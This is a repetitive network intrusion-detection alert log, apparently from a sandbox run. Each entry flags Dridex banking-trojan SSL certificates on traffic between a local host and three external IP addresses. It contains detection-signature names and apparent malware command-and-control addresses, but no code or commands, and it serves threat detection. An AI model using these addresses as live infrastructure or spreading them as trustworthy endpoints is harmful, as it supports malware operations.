                                                                                                                              01/12/21-07:43:44.079883TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:44.585353TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:45.102788TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491885.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:45.102788TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491885.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:46.137309TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:46.647682TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:47.162018TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491925.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:47.162018TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491925.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:48.184795TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:48.705314TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:49.214758TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491965.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:49.214758TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491965.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:50.256207TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:50.782216TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:51.345705TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492005.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:51.345705TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492005.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:52.587001TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:54.171911TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:54.682510TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492045.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:54.682510TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492045.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:55.827256TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:56.340702TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:56.850525TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492085.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:56.850525TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492085.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:57.870601TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:43:58.398276TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:43:58.899992TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492125.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:58.899992TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492125.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:43:59.946668TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:00.463372TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:00.965157TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492165.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:00.965157TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492165.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:01.972986TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:02.482752TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:03.023607TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492205.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:03.023607TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492205.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:04.051670TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:04.576981TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:05.086203TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492245.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:05.086203TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492245.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:06.128903TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:06.640937TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922880.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:07.169169TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492295.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:07.169169TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492295.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:08.250636TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:08.882881TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:09.474906TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492345.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:09.474906TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492345.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:11.343771TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:11.855401TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:12.362938TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492385.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:12.362938TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492385.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:13.389674TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:13.904558TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:14.406142TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492425.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:14.406142TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492425.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:15.452432TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:15.956693TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:16.463563TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492465.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:16.463563TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492465.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:17.511456TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:18.027338TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:18.549889TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492505.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:18.549889TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492505.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:19.586059TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:20.108232TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:20.629742TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492545.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:20.629742TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492545.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:21.677203TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:22.204481TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:22.711412TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492585.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:22.711412TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492585.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:23.748642TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:24.260367TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:24.776557TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492625.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:24.776557TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492625.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:25.826719TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:26.350785TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:27.259582TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492665.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:27.259582TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492665.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:28.880371TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:29.406411TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:29.917421TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492705.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:29.917421TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492705.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:30.961345TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:31.482551TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:31.993012TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492745.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:31.993012TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492745.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:33.033416TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:33.562391TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:34.068398TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492785.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:34.068398TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492785.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:35.080436TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:35.582382TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:36.098738TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492825.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:36.098738TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492825.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:37.133030TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:37.647353TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:38.191268TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492865.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:38.191268TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492865.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:39.227731TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:39.759376TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:40.283765TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492905.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:40.283765TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492905.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:41.335612TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:41.859009TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:42.383117TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492945.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:42.383117TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492945.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:43.409327TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:43.939408TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:44.465253TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492985.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:44.465253TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492985.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:45.532657TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:46.055335TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:46.588990TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493025.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:46.588990TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493025.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:47.638114TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:48.162268TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:48.688061TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493065.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:48.688061TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493065.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:49.744573TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:50.268591TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:50.782405TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493105.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:50.782405TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493105.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:51.831463TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:52.360505TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:52.866561TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493145.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:52.866561TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493145.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:53.924521TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:54.448859TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:54.985880TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493185.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:54.985880TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493185.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:56.032154TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:56.583401TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:57.128393TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493225.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:57.128393TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493225.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:58.167417TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:44:58.691581TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:44:59.202332TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493265.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:44:59.202332TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493265.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:00.228245TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:00.732850TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:01.246663TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493305.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:01.246663TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493305.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:02.282642TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:02.796351TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:03.323912TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493345.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:03.323912TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493345.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:04.378952TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:04.965080TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:05.488500TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493385.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:05.488500TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493385.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:06.525912TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:07.059239TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:07.594874TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493425.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:07.594874TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493425.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:08.641508TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:09.145932TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:09.690643TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493465.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:09.690643TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493465.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:10.758306TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:11.267275TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:11.807918TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493505.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:11.807918TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493505.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:12.865269TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:13.383691TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:13.901860TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493545.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:13.901860TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493545.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:14.940089TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:15.479065TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:16.002150TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493585.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:16.002150TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493585.100.228.233192.168.2.22
